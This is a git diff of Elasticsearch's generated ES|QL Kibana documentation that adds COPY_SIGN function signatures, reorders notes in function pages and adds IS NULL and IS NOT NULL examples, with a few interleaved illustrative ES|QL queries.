sign) which is\nsimilar to `copysign` from IEEE 754.", + "signatures" : [ + { + "params" : [ + { + "name" : "magnitude", + "type" : "double", + "optional" : false, + "description" : "The expression providing the magnitude of the result. Must be a numeric type." + }, + { + "name" : "sign", + "type" : "double", + "optional" : false, + "description" : "The expression providing the sign of the result. Must be a numeric type." + } + ], + "variadic" : false, + "returnType" : "double" + }, + { + "params" : [ + { + "name" : "magnitude", + "type" : "double", + "optional" : false, + "description" : "The expression providing the magnitude of the result. Must be a numeric type." + }, + { + "name" : "sign", + "type" : "integer", + "optional" : false, + "description" : "The expression providing the sign of the result. Must be a numeric type." + } + ], + "variadic" : false, + "returnType" : "double" + }, + { + "params" : [ + { + "name" : "magnitude", + "type" : "double", + "optional" : false, + "description" : "The expression providing the magnitude of the result. Must be a numeric type." + }, + { + "name" : "sign", + "type" : "long", + "optional" : false, + "description" : "The expression providing the sign of the result. Must be a numeric type." + } + ], + "variadic" : false, + "returnType" : "double" + }, + { + "params" : [ + { + "name" : "magnitude", + "type" : "integer", + "optional" : false, + "description" : "The expression providing the magnitude of the result. Must be a numeric type." + }, + { + "name" : "sign", + "type" : "double", + "optional" : false, + "description" : "The expression providing the sign of the result. Must be a numeric type." + } + ], + "variadic" : false, + "returnType" : "integer" + }, + { + "params" : [ + { + "name" : "magnitude", + "type" : "integer", + "optional" : false, + "description" : "The expression providing the magnitude of the result. Must be a numeric type." + }, + { + "name" : "sign", + "type" : "integer", + "optional" : false, + "description" : "The expression providing the sign of the result. Must be a numeric type." 
+ } + ], + "variadic" : false, + "returnType" : "integer" + }, + { + "params" : [ + { + "name" : "magnitude", + "type" : "integer", + "optional" : false, + "description" : "The expression providing the magnitude of the result. Must be a numeric type." + }, + { + "name" : "sign", + "type" : "long", + "optional" : false, + "description" : "The expression providing the sign of the result. Must be a numeric type." + } + ], + "variadic" : false, + "returnType" : "integer" + }, + { + "params" : [ + { + "name" : "magnitude", + "type" : "long", + "optional" : false, + "description" : "The expression providing the magnitude of the result. Must be a numeric type." + }, + { + "name" : "sign", + "type" : "double", + "optional" : false, + "description" : "The expression providing the sign of the result. Must be a numeric type." + } + ], + "variadic" : false, + "returnType" : "long" + }, + { + "params" : [ + { + "name" : "magnitude", + "type" : "long", + "optional" : false, + "description" : "The expression providing the magnitude of the result. Must be a numeric type." + }, + { + "name" : "sign", + "type" : "integer", + "optional" : false, + "description" : "The expression providing the sign of the result. Must be a numeric type." + } + ], + "variadic" : false, + "returnType" : "long" + }, + { + "params" : [ + { + "name" : "magnitude", + "type" : "long", + "optional" : false, + "description" : "The expression providing the magnitude of the result. Must be a numeric type." + }, + { + "name" : "sign", + "type" : "long", + "optional" : false, + "description" : "The expression providing the sign of the result. Must be a numeric type." + } + ], + "variadic" : false, + "returnType" : "long" + } + ], + "preview" : false, + "snapshot_only" : false +} diff --git a/docs/reference/query-languages/esql/kibana/definition/functions/md5.json b/docs/reference/query-languages/esql/kibana/definition/functions/md5.json index b3d320ad838b4..b08d3681e6169 100644 --- a/docs/reference/query-languages/esql/kibana/definition/functions/md5.json +++ b/docs/reference/query-languages/esql/kibana/definition/functions/md5.json @@ -2,7 +2,7 @@ "comment" : "This is generated by ESQL's AbstractFunctionTestCase. Do not edit it. 
See ../README.md for how to regenerate it.", "type" : "scalar", "name" : "md5", - "description" : "Computes the MD5 hash of the input.", + "description" : "Computes the MD5 hash of the input (if the MD5 hash is available on the JVM).", "signatures" : [ { "params" : [ diff --git a/docs/reference/query-languages/esql/kibana/definition/functions/st_geohash.json b/docs/reference/query-languages/esql/kibana/definition/functions/st_geohash.json index d2fc83008c150..43633b336453a 100644 --- a/docs/reference/query-languages/esql/kibana/definition/functions/st_geohash.json +++ b/docs/reference/query-languages/esql/kibana/definition/functions/st_geohash.json @@ -52,4 +52,4 @@ ], "preview" : true, "snapshot_only" : true -} \ No newline at end of file +} diff --git a/docs/reference/query-languages/esql/kibana/definition/functions/st_geohex.json b/docs/reference/query-languages/esql/kibana/definition/functions/st_geohex.json index 9a3a04cb0a7f8..f29db14ed50e7 100644 --- a/docs/reference/query-languages/esql/kibana/definition/functions/st_geohex.json +++ b/docs/reference/query-languages/esql/kibana/definition/functions/st_geohex.json @@ -55,4 +55,4 @@ ], "preview" : true, "snapshot_only" : true -} \ No newline at end of file +} diff --git a/docs/reference/query-languages/esql/kibana/definition/functions/st_geohex_to_long.json b/docs/reference/query-languages/esql/kibana/definition/functions/st_geohex_to_long.json index 52c7918a0c3ad..d582739620024 100644 --- a/docs/reference/query-languages/esql/kibana/definition/functions/st_geohex_to_long.json +++ b/docs/reference/query-languages/esql/kibana/definition/functions/st_geohex_to_long.json @@ -34,4 +34,4 @@ ], "preview" : true, "snapshot_only" : true -} \ No newline at end of file +} diff --git a/docs/reference/query-languages/esql/kibana/definition/functions/st_geohex_to_string.json b/docs/reference/query-languages/esql/kibana/definition/functions/st_geohex_to_string.json index 612b13691d40c..a1abce7c75adb 100644 --- a/docs/reference/query-languages/esql/kibana/definition/functions/st_geohex_to_string.json +++ b/docs/reference/query-languages/esql/kibana/definition/functions/st_geohex_to_string.json @@ -34,4 +34,4 @@ ], "preview" : true, "snapshot_only" : true -} \ No newline at end of file +} diff --git a/docs/reference/query-languages/esql/kibana/definition/functions/st_geotile.json b/docs/reference/query-languages/esql/kibana/definition/functions/st_geotile.json index 06df5e3076fea..d728f186fc5ae 100644 --- a/docs/reference/query-languages/esql/kibana/definition/functions/st_geotile.json +++ b/docs/reference/query-languages/esql/kibana/definition/functions/st_geotile.json @@ -52,4 +52,4 @@ ], "preview" : true, "snapshot_only" : true -} \ No newline at end of file +} diff --git a/docs/reference/query-languages/esql/kibana/definition/functions/st_geotile_to_long.json b/docs/reference/query-languages/esql/kibana/definition/functions/st_geotile_to_long.json index 2eb49b5c320f9..b2c7c01aea606 100644 --- a/docs/reference/query-languages/esql/kibana/definition/functions/st_geotile_to_long.json +++ b/docs/reference/query-languages/esql/kibana/definition/functions/st_geotile_to_long.json @@ -34,4 +34,4 @@ ], "preview" : true, "snapshot_only" : true -} \ No newline at end of file +} diff --git a/docs/reference/query-languages/esql/kibana/definition/functions/st_geotile_to_string.json b/docs/reference/query-languages/esql/kibana/definition/functions/st_geotile_to_string.json index df8e91514dc7b..5a327c2c50976 100644 --- 
a/docs/reference/query-languages/esql/kibana/definition/functions/st_geotile_to_string.json +++ b/docs/reference/query-languages/esql/kibana/definition/functions/st_geotile_to_string.json @@ -34,4 +34,4 @@ ], "preview" : true, "snapshot_only" : true -} \ No newline at end of file +} diff --git a/docs/reference/query-languages/esql/kibana/definition/operators/is_not_null.json b/docs/reference/query-languages/esql/kibana/definition/operators/is_not_null.json index 3722fbfaddeb8..f184165c249d4 100644 --- a/docs/reference/query-languages/esql/kibana/definition/operators/is_not_null.json +++ b/docs/reference/query-languages/esql/kibana/definition/operators/is_not_null.json @@ -223,6 +223,9 @@ "returnType" : "boolean" } ], + "examples" : [ + "FROM employees\n| WHERE is_rehired IS NOT NULL\n| STATS COUNT(emp_no)" + ], "preview" : false, "snapshot_only" : false } diff --git a/docs/reference/query-languages/esql/kibana/definition/operators/is_null.json b/docs/reference/query-languages/esql/kibana/definition/operators/is_null.json index 0f6e70f8a0b91..dd8c9b4e3d4e7 100644 --- a/docs/reference/query-languages/esql/kibana/definition/operators/is_null.json +++ b/docs/reference/query-languages/esql/kibana/definition/operators/is_null.json @@ -223,6 +223,9 @@ "returnType" : "boolean" } ], + "examples" : [ + "FROM employees\n| WHERE birth_date IS NULL" + ], "preview" : false, "snapshot_only" : false } diff --git a/docs/reference/query-languages/esql/kibana/definition/operators/like.json b/docs/reference/query-languages/esql/kibana/definition/operators/like.json index 49a455421a17e..97c88faa6e8fe 100644 --- a/docs/reference/query-languages/esql/kibana/definition/operators/like.json +++ b/docs/reference/query-languages/esql/kibana/definition/operators/like.json @@ -3,7 +3,7 @@ "type" : "operator", "operator" : "LIKE", "name" : "like", - "description" : "Use `LIKE` to filter data based on string patterns using wildcards. `LIKE`\nusually acts on a field placed on the left-hand side of the operator, but it can\nalso act on a constant (literal) expression. The right-hand side of the operator\nrepresents the pattern or a list of patterns. If a list of patterns is provided,\nthe expression will return true if any of the patterns match.\n\nThe following wildcard characters are supported:\n\n* `*` matches zero or more characters.\n* `?` matches one character.", + "description" : "Use `LIKE` to filter data based on string patterns using wildcards. `LIKE`\nusually acts on a field placed on the left-hand side of the operator, but it can\nalso act on a constant (literal) expression. The right-hand side of the operator\nrepresents the pattern.\n\nThe following wildcard characters are supported:\n\n* `*` matches zero or more characters.\n* `?` matches one character.", "signatures" : [ { "params" : [ diff --git a/docs/reference/query-languages/esql/kibana/definition/operators/not like.json b/docs/reference/query-languages/esql/kibana/definition/operators/not like.json index e24559de82f59..8fbaf03df75df 100644 --- a/docs/reference/query-languages/esql/kibana/definition/operators/not like.json +++ b/docs/reference/query-languages/esql/kibana/definition/operators/not like.json @@ -3,7 +3,7 @@ "type" : "operator", "operator" : "not like", "name" : "not_like", - "description" : "Use `LIKE` to filter data based on string patterns using wildcards. `LIKE`\nusually acts on a field placed on the left-hand side of the operator, but it can\nalso act on a constant (literal) expression. 
The right-hand side of the operator\nrepresents the pattern or a list of patterns. If a list of patterns is provided,\nthe expression will return true if any of the patterns match.\n\nThe following wildcard characters are supported:\n\n* `*` matches zero or more characters.\n* `?` matches one character.", + "description" : "Use `LIKE` to filter data based on string patterns using wildcards. `LIKE`\nusually acts on a field placed on the left-hand side of the operator, but it can\nalso act on a constant (literal) expression. The right-hand side of the operator\nrepresents the pattern.\n\nThe following wildcard characters are supported:\n\n* `*` matches zero or more characters.\n* `?` matches one character.", "signatures" : [ { "params" : [ diff --git a/docs/reference/query-languages/esql/kibana/definition/operators/predicates.json b/docs/reference/query-languages/esql/kibana/definition/operators/predicates.json deleted file mode 100644 index 516343c17af53..0000000000000 --- a/docs/reference/query-languages/esql/kibana/definition/operators/predicates.json +++ /dev/null @@ -1,194 +0,0 @@ -{ - "comment" : "This is generated by ESQL's AbstractFunctionTestCase. Do not edit it. See ../README.md for how to regenerate it.", - "type" : "scalar", - "name" : "predicates", - "description" : "For NULL comparison use the `IS NULL` and `IS NOT NULL` predicates.", - "signatures" : [ - { - "params" : [ - { - "name" : "field", - "type" : "boolean", - "optional" : false, - "description" : "Input value. The input can be a single- or multi-valued column or an expression." - } - ], - "variadic" : false, - "returnType" : "boolean" - }, - { - "params" : [ - { - "name" : "field", - "type" : "cartesian_point", - "optional" : false, - "description" : "Input value. The input can be a single- or multi-valued column or an expression." - } - ], - "variadic" : false, - "returnType" : "boolean" - }, - { - "params" : [ - { - "name" : "field", - "type" : "cartesian_shape", - "optional" : false, - "description" : "Input value. The input can be a single- or multi-valued column or an expression." - } - ], - "variadic" : false, - "returnType" : "boolean" - }, - { - "params" : [ - { - "name" : "field", - "type" : "date", - "optional" : false, - "description" : "Input value. The input can be a single- or multi-valued column or an expression." - } - ], - "variadic" : false, - "returnType" : "boolean" - }, - { - "params" : [ - { - "name" : "field", - "type" : "date_nanos", - "optional" : false, - "description" : "Input value. The input can be a single- or multi-valued column or an expression." - } - ], - "variadic" : false, - "returnType" : "boolean" - }, - { - "params" : [ - { - "name" : "field", - "type" : "double", - "optional" : false, - "description" : "Input value. The input can be a single- or multi-valued column or an expression." - } - ], - "variadic" : false, - "returnType" : "boolean" - }, - { - "params" : [ - { - "name" : "field", - "type" : "geo_point", - "optional" : false, - "description" : "Input value. The input can be a single- or multi-valued column or an expression." - } - ], - "variadic" : false, - "returnType" : "boolean" - }, - { - "params" : [ - { - "name" : "field", - "type" : "geo_shape", - "optional" : false, - "description" : "Input value. The input can be a single- or multi-valued column or an expression." - } - ], - "variadic" : false, - "returnType" : "boolean" - }, - { - "params" : [ - { - "name" : "field", - "type" : "integer", - "optional" : false, - "description" : "Input value. 
The input can be a single- or multi-valued column or an expression." - } - ], - "variadic" : false, - "returnType" : "boolean" - }, - { - "params" : [ - { - "name" : "field", - "type" : "ip", - "optional" : false, - "description" : "Input value. The input can be a single- or multi-valued column or an expression." - } - ], - "variadic" : false, - "returnType" : "boolean" - }, - { - "params" : [ - { - "name" : "field", - "type" : "keyword", - "optional" : false, - "description" : "Input value. The input can be a single- or multi-valued column or an expression." - } - ], - "variadic" : false, - "returnType" : "boolean" - }, - { - "params" : [ - { - "name" : "field", - "type" : "long", - "optional" : false, - "description" : "Input value. The input can be a single- or multi-valued column or an expression." - } - ], - "variadic" : false, - "returnType" : "boolean" - }, - { - "params" : [ - { - "name" : "field", - "type" : "text", - "optional" : false, - "description" : "Input value. The input can be a single- or multi-valued column or an expression." - } - ], - "variadic" : false, - "returnType" : "boolean" - }, - { - "params" : [ - { - "name" : "field", - "type" : "unsigned_long", - "optional" : false, - "description" : "Input value. The input can be a single- or multi-valued column or an expression." - } - ], - "variadic" : false, - "returnType" : "boolean" - }, - { - "params" : [ - { - "name" : "field", - "type" : "version", - "optional" : false, - "description" : "Input value. The input can be a single- or multi-valued column or an expression." - } - ], - "variadic" : false, - "returnType" : "boolean" - } - ], - "examples" : [ - "FROM employees\n| WHERE birth_date IS NULL", - "FROM employees\n| WHERE is_rehired IS NOT NULL\n| STATS COUNT(emp_no)" - ], - "preview" : false, - "snapshot_only" : false -} diff --git a/docs/reference/query-languages/esql/kibana/docs/functions/bit_length.md b/docs/reference/query-languages/esql/kibana/docs/functions/bit_length.md index 19eb4e805aaf6..6bcd15e35af13 100644 --- a/docs/reference/query-languages/esql/kibana/docs/functions/bit_length.md +++ b/docs/reference/query-languages/esql/kibana/docs/functions/bit_length.md @@ -3,10 +3,11 @@ ### BIT LENGTH Returns the bit length of a string. +Note: All strings are in UTF-8, so a single character can use multiple bytes. + ```esql FROM airports | WHERE country == "India" | KEEP city | EVAL fn_length = LENGTH(city), fn_bit_length = BIT_LENGTH(city) ``` -Note: All strings are in UTF-8, so a single character can use multiple bytes. diff --git a/docs/reference/query-languages/esql/kibana/docs/functions/byte_length.md b/docs/reference/query-languages/esql/kibana/docs/functions/byte_length.md index 6d9a7c9c10c41..a503e9cf54706 100644 --- a/docs/reference/query-languages/esql/kibana/docs/functions/byte_length.md +++ b/docs/reference/query-languages/esql/kibana/docs/functions/byte_length.md @@ -3,10 +3,11 @@ ### BYTE LENGTH Returns the byte length of a string. +Note: All strings are in UTF-8, so a single character can use multiple bytes. + ```esql FROM airports | WHERE country == "India" | KEEP city | EVAL fn_length = LENGTH(city), fn_byte_length = BYTE_LENGTH(city) ``` -Note: All strings are in UTF-8, so a single character can use multiple bytes. 
diff --git a/docs/reference/query-languages/esql/kibana/docs/functions/ceil.md b/docs/reference/query-languages/esql/kibana/docs/functions/ceil.md index 31830a0b700ac..04d14197753f0 100644 --- a/docs/reference/query-languages/esql/kibana/docs/functions/ceil.md +++ b/docs/reference/query-languages/esql/kibana/docs/functions/ceil.md @@ -3,8 +3,9 @@ ### CEIL Round a number up to the nearest integer. +Note: This is a noop for `long` (including unsigned) and `integer`. For `double` this picks the closest `double` value to the integer similar to [Math.ceil](https://docs.oracle.com/en/java/javase/11/docs/api/java.base/java/lang/Math.html#ceil(double)). + ```esql ROW a=1.8 | EVAL a=CEIL(a) ``` -Note: This is a noop for `long` (including unsigned) and `integer`. For `double` this picks the closest `double` value to the integer similar to [Math.ceil](https://docs.oracle.com/en/java/javase/11/docs/api/java.base/java/lang/Math.html#ceil(double)). diff --git a/docs/reference/query-languages/esql/kibana/docs/functions/copy_sign.md b/docs/reference/query-languages/esql/kibana/docs/functions/copy_sign.md new file mode 100644 index 0000000000000..e2bd39f147fbd --- /dev/null +++ b/docs/reference/query-languages/esql/kibana/docs/functions/copy_sign.md @@ -0,0 +1,6 @@ +% This is generated by ESQL's AbstractFunctionTestCase. Do not edit it. See ../README.md for how to regenerate it. + +### COPY SIGN +Returns a value with the magnitude of the first argument and the sign of the second argument. +This function is similar to Java's Math.copySign(double magnitude, double sign) which is +similar to `copysign` from [IEEE 754](https://en.wikipedia.org/wiki/IEEE_754). diff --git a/docs/reference/query-languages/esql/kibana/docs/functions/floor.md b/docs/reference/query-languages/esql/kibana/docs/functions/floor.md index 60cf9cc17ee4c..bdef3d2c31302 100644 --- a/docs/reference/query-languages/esql/kibana/docs/functions/floor.md +++ b/docs/reference/query-languages/esql/kibana/docs/functions/floor.md @@ -3,10 +3,11 @@ ### FLOOR Round a number down to the nearest integer. +Note: This is a noop for `long` (including unsigned) and `integer`. +For `double` this picks the closest `double` value to the integer +similar to [Math.floor](https://docs.oracle.com/en/java/javase/11/docs/api/java.base/java/lang/Math.html#floor(double)). + ```esql ROW a=1.8 | EVAL a=FLOOR(a) ``` -Note: This is a noop for `long` (including unsigned) and `integer`. -For `double` this picks the closest `double` value to the integer -similar to [Math.floor](https://docs.oracle.com/en/java/javase/11/docs/api/java.base/java/lang/Math.html#floor(double)). diff --git a/docs/reference/query-languages/esql/kibana/docs/functions/greatest.md b/docs/reference/query-languages/esql/kibana/docs/functions/greatest.md index 752cc0ed77748..5ea02251ed3d1 100644 --- a/docs/reference/query-languages/esql/kibana/docs/functions/greatest.md +++ b/docs/reference/query-languages/esql/kibana/docs/functions/greatest.md @@ -4,8 +4,9 @@ Returns the maximum value from multiple columns. This is similar to [`MV_MAX`](https://www.elastic.co/docs/reference/query-languages/esql/functions-operators/mv-functions#esql-mv_max) except it is intended to run on multiple columns at once. +Note: When run on `keyword` or `text` fields, this returns the last string in alphabetical order. When run on `boolean` columns this will return `true` if any values are `true`. 
+ ```esql ROW a = 10, b = 20 | EVAL g = GREATEST(a, b) ``` -Note: When run on `keyword` or `text` fields, this returns the last string in alphabetical order. When run on `boolean` columns this will return `true` if any values are `true`. diff --git a/docs/reference/query-languages/esql/kibana/docs/functions/length.md b/docs/reference/query-languages/esql/kibana/docs/functions/length.md index 71c4dd554f9f7..8e2713e37e073 100644 --- a/docs/reference/query-languages/esql/kibana/docs/functions/length.md +++ b/docs/reference/query-languages/esql/kibana/docs/functions/length.md @@ -3,10 +3,11 @@ ### LENGTH Returns the character length of a string. +Note: All strings are in UTF-8, so a single character can use multiple bytes. + ```esql FROM airports | WHERE country == "India" | KEEP city | EVAL fn_length = LENGTH(city) ``` -Note: All strings are in UTF-8, so a single character can use multiple bytes. diff --git a/docs/reference/query-languages/esql/kibana/docs/functions/md5.md b/docs/reference/query-languages/esql/kibana/docs/functions/md5.md index 4229afca7398a..e96666870dc97 100644 --- a/docs/reference/query-languages/esql/kibana/docs/functions/md5.md +++ b/docs/reference/query-languages/esql/kibana/docs/functions/md5.md @@ -1,7 +1,7 @@ % This is generated by ESQL's AbstractFunctionTestCase. Do not edit it. See ../README.md for how to regenerate it. ### MD5 -Computes the MD5 hash of the input. +Computes the MD5 hash of the input (if the MD5 hash is available on the JVM). ```esql FROM sample_data diff --git a/docs/reference/query-languages/esql/kibana/docs/functions/median.md b/docs/reference/query-languages/esql/kibana/docs/functions/median.md index 6fc72bfb82421..0028f7afc4934 100644 --- a/docs/reference/query-languages/esql/kibana/docs/functions/median.md +++ b/docs/reference/query-languages/esql/kibana/docs/functions/median.md @@ -3,8 +3,9 @@ ### MEDIAN The value that is greater than half of all values and less than half of all values, also known as the 50% [`PERCENTILE`](https://www.elastic.co/docs/reference/query-languages/esql/functions-operators/aggregation-functions#esql-percentile). +Note: Like [`PERCENTILE`](https://www.elastic.co/docs/reference/query-languages/esql/functions-operators/aggregation-functions#esql-percentile), `MEDIAN` is [usually approximate](https://www.elastic.co/docs/reference/query-languages/esql/functions-operators/aggregation-functions#esql-percentile-approximate). + ```esql FROM employees | STATS MEDIAN(salary), PERCENTILE(salary, 50) ``` -Note: Like [`PERCENTILE`](https://www.elastic.co/docs/reference/query-languages/esql/functions-operators/aggregation-functions#esql-percentile), `MEDIAN` is [usually approximate](https://www.elastic.co/docs/reference/query-languages/esql/functions-operators/aggregation-functions#esql-percentile-approximate). diff --git a/docs/reference/query-languages/esql/kibana/docs/functions/median_absolute_deviation.md b/docs/reference/query-languages/esql/kibana/docs/functions/median_absolute_deviation.md index 4be62924710f1..94a3c0cb9a3f8 100644 --- a/docs/reference/query-languages/esql/kibana/docs/functions/median_absolute_deviation.md +++ b/docs/reference/query-languages/esql/kibana/docs/functions/median_absolute_deviation.md @@ -5,8 +5,9 @@ Returns the median absolute deviation, a measure of variability. It is a robust It is calculated as the median of each data point’s deviation from the median of the entire sample. That is, for a random variable `X`, the median absolute deviation is `median(|median(X) - X|)`. 
+Note: Like [`PERCENTILE`](https://www.elastic.co/docs/reference/query-languages/esql/functions-operators/aggregation-functions#esql-percentile), `MEDIAN_ABSOLUTE_DEVIATION` is [usually approximate](https://www.elastic.co/docs/reference/query-languages/esql/functions-operators/aggregation-functions#esql-percentile-approximate). + ```esql FROM employees | STATS MEDIAN(salary), MEDIAN_ABSOLUTE_DEVIATION(salary) ``` -Note: Like [`PERCENTILE`](https://www.elastic.co/docs/reference/query-languages/esql/functions-operators/aggregation-functions#esql-percentile), `MEDIAN_ABSOLUTE_DEVIATION` is [usually approximate](https://www.elastic.co/docs/reference/query-languages/esql/functions-operators/aggregation-functions#esql-percentile-approximate). diff --git a/docs/reference/query-languages/esql/kibana/docs/functions/mv_dedupe.md b/docs/reference/query-languages/esql/kibana/docs/functions/mv_dedupe.md index 8c37f24139174..7c330e2c8dd63 100644 --- a/docs/reference/query-languages/esql/kibana/docs/functions/mv_dedupe.md +++ b/docs/reference/query-languages/esql/kibana/docs/functions/mv_dedupe.md @@ -3,8 +3,9 @@ ### MV DEDUPE Remove duplicate values from a multivalued field. +Note: `MV_DEDUPE` may, but won’t always, sort the values in the column. + ```esql ROW a=["foo", "foo", "bar", "foo"] | EVAL dedupe_a = MV_DEDUPE(a) ``` -Note: `MV_DEDUPE` may, but won’t always, sort the values in the column. diff --git a/docs/reference/query-languages/esql/kibana/docs/functions/mv_median_absolute_deviation.md b/docs/reference/query-languages/esql/kibana/docs/functions/mv_median_absolute_deviation.md index 94ed0def6195f..0d4863948c9bf 100644 --- a/docs/reference/query-languages/esql/kibana/docs/functions/mv_median_absolute_deviation.md +++ b/docs/reference/query-languages/esql/kibana/docs/functions/mv_median_absolute_deviation.md @@ -5,8 +5,9 @@ Converts a multivalued field into a single valued field containing the median ab It is calculated as the median of each data point’s deviation from the median of the entire sample. That is, for a random variable `X`, the median absolute deviation is `median(|median(X) - X|)`. +Note: If the field has an even number of values, the medians will be calculated as the average of the middle two values. If the value is not a floating point number, the averages are rounded towards 0. + ```esql ROW values = [0, 2, 5, 6] | EVAL median_absolute_deviation = MV_MEDIAN_ABSOLUTE_DEVIATION(values), median = MV_MEDIAN(values) ``` -Note: If the field has an even number of values, the medians will be calculated as the average of the middle two values. If the value is not a floating point number, the averages are rounded towards 0. diff --git a/docs/reference/query-languages/esql/kibana/docs/functions/pow.md b/docs/reference/query-languages/esql/kibana/docs/functions/pow.md index 8c27e49d397f1..da08d767d7e9b 100644 --- a/docs/reference/query-languages/esql/kibana/docs/functions/pow.md +++ b/docs/reference/query-languages/esql/kibana/docs/functions/pow.md @@ -3,8 +3,9 @@ ### POW Returns the value of `base` raised to the power of `exponent`. +Note: It is still possible to overflow a double result here; in that case, null will be returned. + ```esql ROW base = 2.0, exponent = 2 | EVAL result = POW(base, exponent) ``` -Note: It is still possible to overflow a double result here; in that case, null will be returned. 
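The overflow note for `POW` above is easy to check directly. A minimal sketch — any exponent large enough to push the result past the `double` range of roughly 1.8e308 will do:

```esql
ROW base = 2.0, exponent = 2000
| EVAL result = POW(base, exponent)
```

Here `result` comes back as `null` rather than an infinite or wrapped value, matching the note.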
diff --git a/docs/reference/query-languages/esql/kibana/docs/functions/to_date_nanos.md b/docs/reference/query-languages/esql/kibana/docs/functions/to_date_nanos.md index 6d2b18db20680..223ae10b45a4e 100644 --- a/docs/reference/query-languages/esql/kibana/docs/functions/to_date_nanos.md +++ b/docs/reference/query-languages/esql/kibana/docs/functions/to_date_nanos.md @@ -3,10 +3,11 @@ ### TO DATE NANOS Converts an input to a nanosecond-resolution date value (aka date_nanos). +Note: The range for date nanos is 1970-01-01T00:00:00.000000000Z to 2262-04-11T23:47:16.854775807Z, attempting to convert values outside of that range will result in null with a warning. Additionally, integers cannot be converted into date nanos, as the range of integer nanoseconds only covers about 2 seconds after epoch. + ```esql FROM date_nanos | WHERE MV_MIN(nanos) < TO_DATE_NANOS("2023-10-23T12:27:28.948Z") AND millis > "2000-01-01" | SORT nanos DESC ``` -Note: The range for date nanos is 1970-01-01T00:00:00.000000000Z to 2262-04-11T23:47:16.854775807Z, attempting to convert values outside of that range will result in null with a warning. Additionally, integers cannot be converted into date nanos, as the range of integer nanoseconds only covers about 2 seconds after epoch. diff --git a/docs/reference/query-languages/esql/kibana/docs/functions/to_datetime.md b/docs/reference/query-languages/esql/kibana/docs/functions/to_datetime.md index b5361583ff465..de94e09965ce2 100644 --- a/docs/reference/query-languages/esql/kibana/docs/functions/to_datetime.md +++ b/docs/reference/query-languages/esql/kibana/docs/functions/to_datetime.md @@ -5,8 +5,9 @@ Converts an input value to a date value. A string will only be successfully converted if it respects the format `yyyy-MM-dd'T'HH:mm:ss.SSS'Z'`. To convert dates in other formats, use [`DATE_PARSE`](https://www.elastic.co/docs/reference/query-languages/esql/functions-operators/date-time-functions#esql-date_parse). +Note: When converting from nanosecond resolution to millisecond resolution with this function, the nanosecond date is truncated, not rounded. + ```esql ROW string = ["1953-09-02T00:00:00.000Z", "1964-06-02T00:00:00.000Z", "1964-06-02 00:00:00"] | EVAL datetime = TO_DATETIME(string) ``` -Note: Note that when converting from nanosecond resolution to millisecond resolution with this function, the nanosecond date is truncated, not rounded. diff --git a/docs/reference/query-languages/esql/kibana/docs/operators/add.md b/docs/reference/query-languages/esql/kibana/docs/operators/add.md index b07deb2c38360..0d91dcd400252 100644 --- a/docs/reference/query-languages/esql/kibana/docs/operators/add.md +++ b/docs/reference/query-languages/esql/kibana/docs/operators/add.md @@ -2,4 +2,3 @@ ### ADD `+` Add two numbers together. If either field is [multivalued](https://www.elastic.co/docs/reference/query-languages/esql/esql-multivalued-fields) then the result is `null`. - diff --git a/docs/reference/query-languages/esql/kibana/docs/operators/is_not_null.md b/docs/reference/query-languages/esql/kibana/docs/operators/is_not_null.md index 25157e2bb7af2..d91564c45778d 100644 --- a/docs/reference/query-languages/esql/kibana/docs/operators/is_not_null.md +++ b/docs/reference/query-languages/esql/kibana/docs/operators/is_not_null.md @@ -4,3 +4,9 @@ Returns `false` if the value is `NULL`, `true` otherwise. Note: If a field is only in some documents it will be `NULL` in the documents that did not contain it. 
+ +```esql +FROM employees +| WHERE is_rehired IS NOT NULL +| STATS COUNT(emp_no) +``` diff --git a/docs/reference/query-languages/esql/kibana/docs/operators/is_null.md b/docs/reference/query-languages/esql/kibana/docs/operators/is_null.md index 625b819935332..3d9d05d037516 100644 --- a/docs/reference/query-languages/esql/kibana/docs/operators/is_null.md +++ b/docs/reference/query-languages/esql/kibana/docs/operators/is_null.md @@ -4,3 +4,8 @@ Returns `true` if the value is `NULL`, `false` otherwise. Note: If a field is only in some documents it will be `NULL` in the documents that did not contain it. + +```esql +FROM employees +| WHERE birth_date IS NULL +``` diff --git a/docs/reference/query-languages/esql/kibana/docs/operators/like.md b/docs/reference/query-languages/esql/kibana/docs/operators/like.md index ff351eb71bd9a..52bfeb6f3ff95 100644 --- a/docs/reference/query-languages/esql/kibana/docs/operators/like.md +++ b/docs/reference/query-languages/esql/kibana/docs/operators/like.md @@ -4,8 +4,7 @@ Use `LIKE` to filter data based on string patterns using wildcards. `LIKE` usually acts on a field placed on the left-hand side of the operator, but it can also act on a constant (literal) expression. The right-hand side of the operator -represents the pattern or a list of patterns. If a list of patterns is provided, -the expression will return true if any of the patterns match. +represents the pattern. The following wildcard characters are supported: diff --git a/docs/reference/query-languages/esql/kibana/docs/operators/mod.md b/docs/reference/query-languages/esql/kibana/docs/operators/mod.md index 71cad28b1dc23..9a61ddf4b745d 100644 --- a/docs/reference/query-languages/esql/kibana/docs/operators/mod.md +++ b/docs/reference/query-languages/esql/kibana/docs/operators/mod.md @@ -2,4 +2,3 @@ ### MODULO `%` Divide one number by another and return the remainder. If either field is [multivalued](https://www.elastic.co/docs/reference/query-languages/esql/esql-multivalued-fields) then the result is `null`. - diff --git a/docs/reference/query-languages/esql/kibana/docs/operators/mul.md b/docs/reference/query-languages/esql/kibana/docs/operators/mul.md index eaa4cba9d7e7d..97921119d449d 100644 --- a/docs/reference/query-languages/esql/kibana/docs/operators/mul.md +++ b/docs/reference/query-languages/esql/kibana/docs/operators/mul.md @@ -2,4 +2,3 @@ ### MULTIPLY `*` Multiply two numbers together. If either field is [multivalued](https://www.elastic.co/docs/reference/query-languages/esql/esql-multivalued-fields) then the result is `null`. - diff --git a/docs/reference/query-languages/esql/kibana/docs/operators/neg.md b/docs/reference/query-languages/esql/kibana/docs/operators/neg.md index 036c545d247f4..e25b1ede4c47a 100644 --- a/docs/reference/query-languages/esql/kibana/docs/operators/neg.md +++ b/docs/reference/query-languages/esql/kibana/docs/operators/neg.md @@ -2,4 +2,3 @@ ### NEGATE `-` Returns the negation of the argument. - diff --git a/docs/reference/query-languages/esql/kibana/docs/operators/not in.md b/docs/reference/query-languages/esql/kibana/docs/operators/not in.md index 810773cf977ff..d638a876148dd 100644 --- a/docs/reference/query-languages/esql/kibana/docs/operators/not in.md +++ b/docs/reference/query-languages/esql/kibana/docs/operators/not in.md @@ -2,4 +2,3 @@ ### NOT IN The `NOT IN` operator allows testing whether a field or expression does *not* equal any element in a list of literals, fields or expressions. 
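For illustration, a short sketch of `NOT IN` against the `employees` sample index used elsewhere in these docs — the exact field names are assumptions based on that dataset:

```esql
FROM employees
| WHERE emp_no NOT IN (10001, 10002, 10003)
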